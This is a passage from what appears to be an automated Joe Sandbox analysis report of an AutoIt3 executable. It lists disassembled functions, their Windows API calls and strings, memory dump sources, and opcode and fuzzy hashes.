                                      • CreateCompatibleDC.GDI32(?), ref: 00877A91
                                      • SelectObject.GDI32(00000000,?), ref: 00877A9E
                                      • StretchBlt.GDI32(00000006,00000000,00000000,00000007,?,?,?,?,00000007,?,00CC0020), ref: 00877AF2
                                      • GetDIBits.GDI32(00000006,?,00000000,00000000,00000000,00000028,00000000), ref: 00877B2E
                                      • GetDIBits.GDI32(00000006,?,00000000,?,00000000,00000028,00000000), ref: 00877B52
                                      • SelectObject.GDI32(00000006,?), ref: 00877B5A
                                      • DeleteObject.GDI32(?), ref: 00877B63
                                      • DeleteDC.GDI32(00000006), ref: 00877B6A
                                      • ReleaseDC.USER32(00000000,?), ref: 00877B75
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1740385519.0000000000801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00800000, based on PE: true
                                      • Associated: 00000003.00000002.1740355672.0000000000800000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.0000000000890000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.00000000008B6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740554053.00000000008C0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740584762.00000000008C9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_800000_Autoit3.jbxd
                                      Similarity
                                      • API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
                                      • String ID: (
                                      • API String ID: 2598888154-3887548279
                                      • Opcode ID: 4577615cc314f4358a8802f99667ddf5be96cea2821205d6f5da22279df8f058
                                      • Instruction ID: b1ce7660112fb70041e68bf99c10e6b749bc375689c5a58a9448436eabbd7353
                                      • Opcode Fuzzy Hash: 4577615cc314f4358a8802f99667ddf5be96cea2821205d6f5da22279df8f058
                                      • Instruction Fuzzy Hash: 57513772904319AFDB15DFA8DC85EAEBBB9FF48310F14841AE94AE7250D731A940CB60
                                      Function 0086A48D Relevance: 21.2, APIs: 7, Strings: 5, Instructions: 156COMMON
                                      Download Yara Rule
                                      APIs
                                      • LoadStringW.USER32(00000066,?,00000FFF,?), ref: 0086A4D4
                                        • Part of subcall function 00811A36: _memmove.LIBCMT ref: 00811A77
                                      • LoadStringW.USER32(?,?,00000FFF,?), ref: 0086A4F6
                                      • __swprintf.LIBCMT ref: 0086A54F
                                      • __swprintf.LIBCMT ref: 0086A568
                                      • _wprintf.LIBCMT ref: 0086A61E
                                      • _wprintf.LIBCMT ref: 0086A63C
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1740385519.0000000000801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00800000, based on PE: true
                                      • Associated: 00000003.00000002.1740355672.0000000000800000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.0000000000890000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.00000000008B6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740554053.00000000008C0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740584762.00000000008C9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_800000_Autoit3.jbxd
                                      Similarity
                                      • API ID: LoadString__swprintf_wprintf$_memmove
                                      • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                                      • API String ID: 311963372-2391861430
                                      • Opcode ID: c7dedc6d8457bee0e82cda4069edf029604fc960b63ed98fe18401ec5c73cb39
                                      • Instruction ID: 0aaf7d495516df53c2b821f7072e017c7808a852b781413aae35d2e2b86696ea
                                      • Opcode Fuzzy Hash: c7dedc6d8457bee0e82cda4069edf029604fc960b63ed98fe18401ec5c73cb39
                                      • Instruction Fuzzy Hash: E0516971900119AACF19EBA4CD4AEEEB779FF14340F100165B615F21A2EB356F98CF52
                                      Function 00869710 Relevance: 19.8, APIs: 13, Instructions: 322fileCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 0086951A: __time64.LIBCMT ref: 00869524
                                        • Part of subcall function 00814A8C: _fseek.LIBCMT ref: 00814AA4
                                      • __wsplitpath.LIBCMT ref: 008697EF
                                        • Part of subcall function 0082431E: __wsplitpath_helper.LIBCMT ref: 0082435E
                                      • _wcscpy.LIBCMT ref: 00869802
                                      • _wcscat.LIBCMT ref: 00869815
                                      • __wsplitpath.LIBCMT ref: 0086983A
                                      • _wcscat.LIBCMT ref: 00869850
                                      • _wcscat.LIBCMT ref: 00869863
                                        • Part of subcall function 00869560: _memmove.LIBCMT ref: 00869599
                                        • Part of subcall function 00869560: _memmove.LIBCMT ref: 008695A8
                                      • _wcscmp.LIBCMT ref: 008697AA
                                        • Part of subcall function 00869CF1: _wcscmp.LIBCMT ref: 00869DE1
                                        • Part of subcall function 00869CF1: _wcscmp.LIBCMT ref: 00869DF4
                                      • DeleteFileW.KERNEL32(?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 00869A0D
                                      • _wcsncpy.LIBCMT ref: 00869A80
                                      • DeleteFileW.KERNEL32(?,?), ref: 00869AB6
                                      • CopyFileW.KERNEL32(?,?,00000000,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 00869ACC
                                      • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00869ADD
                                      • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00869AEF
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1740385519.0000000000801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00800000, based on PE: true
                                      • Associated: 00000003.00000002.1740355672.0000000000800000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.0000000000890000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.00000000008B6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740554053.00000000008C0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740584762.00000000008C9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_800000_Autoit3.jbxd
                                      Similarity
                                      • API ID: File$Delete$_wcscat_wcscmp$__wsplitpath_memmove$Copy__time64__wsplitpath_helper_fseek_wcscpy_wcsncpy
                                      • String ID:
                                      • API String ID: 1500180987-0
                                      • Opcode ID: 02c353b74bb55326b982c0c59f13177e1d4dc43004f526fe31b76cd53089582b
                                      • Instruction ID: d7c87ccdda619a5d3bc3b1aba663498a30f3f846995dc9afe09ccfac516a8516
                                      • Opcode Fuzzy Hash: 02c353b74bb55326b982c0c59f13177e1d4dc43004f526fe31b76cd53089582b
                                      • Instruction Fuzzy Hash: 87C12DB1900229AADF21DF99DC85EDEB7BDFF44310F0040AAF649E7151EB709A848F65
                                      Function 00815BD7 Relevance: 19.7, APIs: 13, Instructions: 215windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • _memset.LIBCMT ref: 00815BF1
                                      • GetMenuItemCount.USER32(008C7890), ref: 00850E7B
                                      • GetMenuItemCount.USER32(008C7890), ref: 00850F2B
                                      • GetCursorPos.USER32(?), ref: 00850F6F
                                      • SetForegroundWindow.USER32(00000000), ref: 00850F78
                                      • TrackPopupMenuEx.USER32(008C7890,00000000,?,00000000,00000000,00000000), ref: 00850F8B
                                      • PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 00850F97
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1740385519.0000000000801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00800000, based on PE: true
                                      • Associated: 00000003.00000002.1740355672.0000000000800000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.0000000000890000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.00000000008B6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740554053.00000000008C0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740584762.00000000008C9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_800000_Autoit3.jbxd
                                      Similarity
                                      • API ID: Menu$CountItem$CursorForegroundMessagePopupPostTrackWindow_memset
                                      • String ID:
                                      • API String ID: 2751501086-0
                                      • Opcode ID: f0b62edefb973806fa7ecd22d9de49381ba482f28e99ed825bb47a3c36d666ce
                                      • Instruction ID: e23304cbb50fa60c98ccea2650d247a662c3d255cd9c90c4371244c8e1373102
                                      • Opcode Fuzzy Hash: f0b62edefb973806fa7ecd22d9de49381ba482f28e99ed825bb47a3c36d666ce
                                      • Instruction Fuzzy Hash: 6D71F030604609BFEB219F54DC86FAABF69FF44365F240216F928EA1D0C7B16864DF91
                                      Function 008583FA Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 128registryshareCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 00811821: _memmove.LIBCMT ref: 0081185B
                                      • _memset.LIBCMT ref: 00858489
                                      • WNetAddConnection2W.MPR(?,?,?,00000000), ref: 008584BE
                                      • RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 008584DA
                                      • RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,SOFTWARE\Classes\), ref: 008584F6
                                      • RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?,?,SOFTWARE\Classes\), ref: 00858520
                                      • CLSIDFromString.OLE32(?,?,?,SOFTWARE\Classes\), ref: 00858548
                                      • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 00858553
                                      • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 00858558
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1740385519.0000000000801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00800000, based on PE: true
                                      • Associated: 00000003.00000002.1740355672.0000000000800000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.0000000000890000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.00000000008B6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740554053.00000000008C0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740584762.00000000008C9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_800000_Autoit3.jbxd
                                      Similarity
                                      • API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_memmove_memset
                                      • String ID: SOFTWARE\Classes\$\CLSID$\IPC$
                                      • API String ID: 1411258926-22481851
                                      • Opcode ID: 8c80033800c87dba05d95ba55fb964fb663231bb0b68622cdab6294dc2760094
                                      • Instruction ID: ebed3f2e2563ceb6950dd08b84096a2332889783c4094134b246b6f295101973
                                      • Opcode Fuzzy Hash: 8c80033800c87dba05d95ba55fb964fb663231bb0b68622cdab6294dc2760094
                                      • Instruction Fuzzy Hash: 95410772D1062DABCF11EBA8DC95DEDB7B8FF08741B04412AE915F2261EB305E48CB91
                                      Function 0088147A Relevance: 19.4, APIs: 1, Strings: 10, Instructions: 120COMMON
                                      Download Yara Rule
                                      APIs
                                      • CharUpperBuffW.USER32(?,?,?,?,?,?,?,0088040D,?,?), ref: 00881491
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1740385519.0000000000801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00800000, based on PE: true
                                      • Associated: 00000003.00000002.1740355672.0000000000800000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.0000000000890000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.00000000008B6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740554053.00000000008C0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740584762.00000000008C9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_800000_Autoit3.jbxd
                                      Similarity
                                      • API ID: BuffCharUpper
                                      • String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
                                      • API String ID: 3964851224-909552448
                                      • Opcode ID: 2be931d35e01ebe483f2a13ee207587815fa92abb04f33d8ddc5e9ae1f98c315
                                      • Instruction ID: d1ff808b398b236f0b464962a133b723ccc6eccf2d835b7cb512442322f15dc0
                                      • Opcode Fuzzy Hash: 2be931d35e01ebe483f2a13ee207587815fa92abb04f33d8ddc5e9ae1f98c315
                                      • Instruction Fuzzy Hash: 9741167051126A8BDF00EF98E855AEA3728FF51304F604525FD52DB292DF30AD9ACB62
                                      Function 0085FF5C Relevance: 19.3, APIs: 6, Strings: 5, Instructions: 75windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,00000000,?,0084FB41,00000010,?,Bad directive syntax error,00890980,00000000,?,?,?), ref: 0085FF7D
                                      • LoadStringW.USER32(00000000,?,0084FB41,00000010), ref: 0085FF84
                                        • Part of subcall function 00811A36: _memmove.LIBCMT ref: 00811A77
                                      • _wprintf.LIBCMT ref: 0085FFB7
                                      • __swprintf.LIBCMT ref: 0085FFD9
                                      • MessageBoxW.USER32(00000000,00000001,00000001,00011010), ref: 00860048
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1740385519.0000000000801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00800000, based on PE: true
                                      • Associated: 00000003.00000002.1740355672.0000000000800000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.0000000000890000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.00000000008B6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740554053.00000000008C0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740584762.00000000008C9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_800000_Autoit3.jbxd
                                      Similarity
                                      • API ID: HandleLoadMessageModuleString__swprintf_memmove_wprintf
                                      • String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
                                      • API String ID: 1506413516-4153970271
                                      • Opcode ID: 77ae6292debbba946c7f62c2aab3a80884737b6bda20824fc5b93906d4516359
                                      • Instruction ID: 694eb5879b6dc6962aa0349247af0da62575c309c9fccad2931e025b09ff7adb
                                      • Opcode Fuzzy Hash: 77ae6292debbba946c7f62c2aab3a80884737b6bda20824fc5b93906d4516359
                                      • Instruction Fuzzy Hash: 7C21733194022DABCF16EF94CC1AEEE7B39FF14300F040455F615E21A2DA75A668DB52
                                      Function 00865882 Relevance: 19.3, APIs: 5, Strings: 6, Instructions: 74COMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 00811821: _memmove.LIBCMT ref: 0081185B
                                        • Part of subcall function 0081153B: _memmove.LIBCMT ref: 008115C4
                                      • mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 008658EB
                                      • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 00865901
                                      • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00865912
                                      • mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 00865924
                                      • mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 00865935
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1740385519.0000000000801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00800000, based on PE: true
                                      • Associated: 00000003.00000002.1740355672.0000000000800000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.0000000000890000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.00000000008B6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740554053.00000000008C0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740584762.00000000008C9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_800000_Autoit3.jbxd
                                      Similarity
                                      • API ID: SendString$_memmove
                                      • String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
                                      • API String ID: 2279737902-1007645807
                                      • Opcode ID: 15c4b118e243064e194d5e27d34a669328cde9acd8cff51a886c8e987536f10a
                                      • Instruction ID: a60aaa5da06fe169b73458c860e351ff020b74c195a132dbc22a18c93874dff8
                                      • Opcode Fuzzy Hash: 15c4b118e243064e194d5e27d34a669328cde9acd8cff51a886c8e987536f10a
                                      • Instruction Fuzzy Hash: 9111E230A50129B9DB20A7A5DC4ADFFAFBCFF95B50F800429B421E22D0DAA01940C9A1
                                      Function 00864C0C Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 73networkCOMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1740385519.0000000000801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00800000, based on PE: true
                                      • Associated: 00000003.00000002.1740355672.0000000000800000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.0000000000890000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.00000000008B6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740554053.00000000008C0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740584762.00000000008C9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_800000_Autoit3.jbxd
                                      Similarity
                                      • API ID: _wcscpy$CleanupStartup_memmove_strcatgethostbynamegethostnameinet_ntoa
                                      • String ID: 0.0.0.0
                                      • API String ID: 208665112-3771769585
                                      • Opcode ID: 0f1f53cc2a2c42b97fc5981d2ce0f3857689660740ce61da534114e34a0e2808
                                      • Instruction ID: a00d71875e1a1fd5507fdc8440a55220b9fdc2cfa7e197a3321ef58d61048519
                                      • Opcode Fuzzy Hash: 0f1f53cc2a2c42b97fc5981d2ce0f3857689660740ce61da534114e34a0e2808
                                      • Instruction Fuzzy Hash: 4B112432604128BFCB21B764AD4AEEE77BCFF40710F0901A6F004E2291EF7099C18A61
                                      Function 00865530 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 72sleepwindowtimeCOMMON
                                      Download Yara Rule
                                      APIs
                                      • timeGetTime.WINMM ref: 00865535
                                        • Part of subcall function 00820859: timeGetTime.WINMM(?,00000002,0080C22C), ref: 0082085D
                                      • Sleep.KERNEL32(0000000A), ref: 00865561
                                      • EnumThreadWindows.USER32(?,Function_000654E3,00000000), ref: 00865585
                                      • FindWindowExW.USER32(00000000,00000000,BUTTON,00000000), ref: 008655A7
                                      • SetActiveWindow.USER32 ref: 008655C6
                                      • SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 008655D4
                                      • SendMessageW.USER32(00000010,00000000,00000000), ref: 008655F3
                                      • Sleep.KERNEL32(000000FA), ref: 008655FE
                                      • IsWindow.USER32 ref: 0086560A
                                      • EndDialog.USER32(00000000), ref: 0086561B
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1740385519.0000000000801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00800000, based on PE: true
                                      • Associated: 00000003.00000002.1740355672.0000000000800000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.0000000000890000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.00000000008B6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740554053.00000000008C0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740584762.00000000008C9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_800000_Autoit3.jbxd
                                      Similarity
                                      • API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
                                      • String ID: BUTTON
                                      • API String ID: 1194449130-3405671355
                                      • Opcode ID: 2196d1c2ef4b3264ec678d1eb69746563a313e36ac4971ea5866f13d44533e95
                                      • Instruction ID: 36004d848a29a8334cca063c3a1c3672a858f149cdd4590ac932668945f95da5
                                      • Opcode Fuzzy Hash: 2196d1c2ef4b3264ec678d1eb69746563a313e36ac4971ea5866f13d44533e95
                                      • Instruction Fuzzy Hash: 10218E71248604AFE7416B64EC8DE263B7AFB54345F4A1019F503C22B1DFB29D50DF62
                                      Function 0086DBD0 Relevance: 18.3, APIs: 12, Instructions: 283comCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 00804D37: __itow.LIBCMT ref: 00804D62
                                        • Part of subcall function 00804D37: __swprintf.LIBCMT ref: 00804DAC
                                      • CoInitialize.OLE32(00000000), ref: 0086DC2D
                                      • SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 0086DCC0
                                      • SHGetDesktopFolder.SHELL32(?), ref: 0086DCD4
                                      • CoCreateInstance.OLE32(00893D4C,00000000,00000001,008BB86C,?), ref: 0086DD20
                                      • SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 0086DD8F
                                      • CoTaskMemFree.OLE32(?,?), ref: 0086DDE7
                                      • _memset.LIBCMT ref: 0086DE24
                                      • SHBrowseForFolderW.SHELL32(?), ref: 0086DE60
                                      • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 0086DE83
                                      • CoTaskMemFree.OLE32(00000000), ref: 0086DE8A
                                      • CoTaskMemFree.OLE32(00000000,00000001,00000000), ref: 0086DEC1
                                      • CoUninitialize.OLE32(00000001,00000000), ref: 0086DEC3
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1740385519.0000000000801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00800000, based on PE: true
                                      • Associated: 00000003.00000002.1740355672.0000000000800000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.0000000000890000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.00000000008B6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740554053.00000000008C0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740584762.00000000008C9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_800000_Autoit3.jbxd
                                      Similarity
                                      • API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize__itow__swprintf_memset
                                      • String ID:
                                      • API String ID: 1246142700-0
                                      • Opcode ID: b5da19406ddd32d4c5ed5b1f9c10d44ad1f68238a51b4224d710910dbb2b2b44
                                      • Instruction ID: ebf2b8662e1e12c0673400435ffab09189fea07a88840f1990fcd6b2b005896b
                                      • Opcode Fuzzy Hash: b5da19406ddd32d4c5ed5b1f9c10d44ad1f68238a51b4224d710910dbb2b2b44
                                      • Instruction Fuzzy Hash: 97B1EB75A00209AFDB04EFA8C888DAEBBB9FF48304B158459E905EB351DB31ED45CF51
                                      Function 0086081B Relevance: 18.2, APIs: 12, Instructions: 186keyboardCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetKeyboardState.USER32(?), ref: 00860896
                                      • SetKeyboardState.USER32(?), ref: 00860901
                                      • GetAsyncKeyState.USER32(000000A0), ref: 00860921
                                      • GetKeyState.USER32(000000A0), ref: 00860938
                                      • GetAsyncKeyState.USER32(000000A1), ref: 00860967
                                      • GetKeyState.USER32(000000A1), ref: 00860978
                                      • GetAsyncKeyState.USER32(00000011), ref: 008609A4
                                      • GetKeyState.USER32(00000011), ref: 008609B2
                                      • GetAsyncKeyState.USER32(00000012), ref: 008609DB
                                      • GetKeyState.USER32(00000012), ref: 008609E9
                                      • GetAsyncKeyState.USER32(0000005B), ref: 00860A12
                                      • GetKeyState.USER32(0000005B), ref: 00860A20
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1740385519.0000000000801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00800000, based on PE: true
                                      • Associated: 00000003.00000002.1740355672.0000000000800000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.0000000000890000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.00000000008B6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740554053.00000000008C0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740584762.00000000008C9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_800000_Autoit3.jbxd
                                      Similarity
                                      • API ID: State$Async$Keyboard
                                      • String ID:
                                      • API String ID: 541375521-0
                                      • Opcode ID: c0b8c6e42006915e0d095b84ccdee43d532f2e537a0044753802fb08de28ff19
                                      • Instruction ID: b981177bb1c505a965e7a3c3927a70b3be3164881f387388071f0b3de799fd9b
                                      • Opcode Fuzzy Hash: c0b8c6e42006915e0d095b84ccdee43d532f2e537a0044753802fb08de28ff19
                                      • Instruction Fuzzy Hash: 80519A2090478819FB35DBA448157ABBFB5FF01380F0A459995C2DB1C3DA649A4CCFAA
                                      Function 0085CE00 Relevance: 18.2, APIs: 12, Instructions: 174COMMON
                                      Download Yara Rule
                                      APIs
                                      • GetDlgItem.USER32(?,00000001), ref: 0085CE1C
                                      • GetWindowRect.USER32(00000000,?), ref: 0085CE2E
                                      • MoveWindow.USER32(00000001,0000000A,?,00000001,?,00000000), ref: 0085CE8C
                                      • GetDlgItem.USER32(?,00000002), ref: 0085CE97
                                      • GetWindowRect.USER32(00000000,?), ref: 0085CEA9
                                      • MoveWindow.USER32(00000001,?,00000000,00000001,?,00000000), ref: 0085CEFD
                                      • GetDlgItem.USER32(?,000003E9), ref: 0085CF0B
                                      • GetWindowRect.USER32(00000000,?), ref: 0085CF1C
                                      • MoveWindow.USER32(00000000,0000000A,00000000,?,?,00000000), ref: 0085CF5F
                                      • GetDlgItem.USER32(?,000003EA), ref: 0085CF6D
                                      • MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 0085CF8A
                                      • InvalidateRect.USER32(?,00000000,00000001), ref: 0085CF97
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1740385519.0000000000801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00800000, based on PE: true
                                      • Associated: 00000003.00000002.1740355672.0000000000800000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.0000000000890000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.00000000008B6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740554053.00000000008C0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740584762.00000000008C9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_800000_Autoit3.jbxd
                                      Similarity
                                      • API ID: Window$ItemMoveRect$Invalidate
                                      • String ID:
                                      • API String ID: 3096461208-0
                                      • Opcode ID: 0b5b3bea48f0a47833af99959ef52be880bb54b4c1549108213040c992135da2
                                      • Instruction ID: 0f19a59548bddfa80de7c418fad7f7310d32ea4308aed48df31e1a506f924e45
                                      • Opcode Fuzzy Hash: 0b5b3bea48f0a47833af99959ef52be880bb54b4c1549108213040c992135da2
                                      • Instruction Fuzzy Hash: 4D514171B00305AFDB18DFA8DD85A6EBBB6FB88711F14812DF916D6290D770AD048F50
                                      Function 008023F7 Relevance: 18.2, APIs: 12, Instructions: 170timeCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 00801F1D: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00802412,?,00000000,?,?,?,?,00801AA7,00000000,?), ref: 00801F76
                                      • DestroyWindow.USER32(?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 008024AF
                                      • KillTimer.USER32(00000000,?,?,?,?,00801AA7,00000000,?,?,00801EBE,?,?), ref: 0080254A
                                      • DestroyAcceleratorTable.USER32(00000000), ref: 0083BFE7
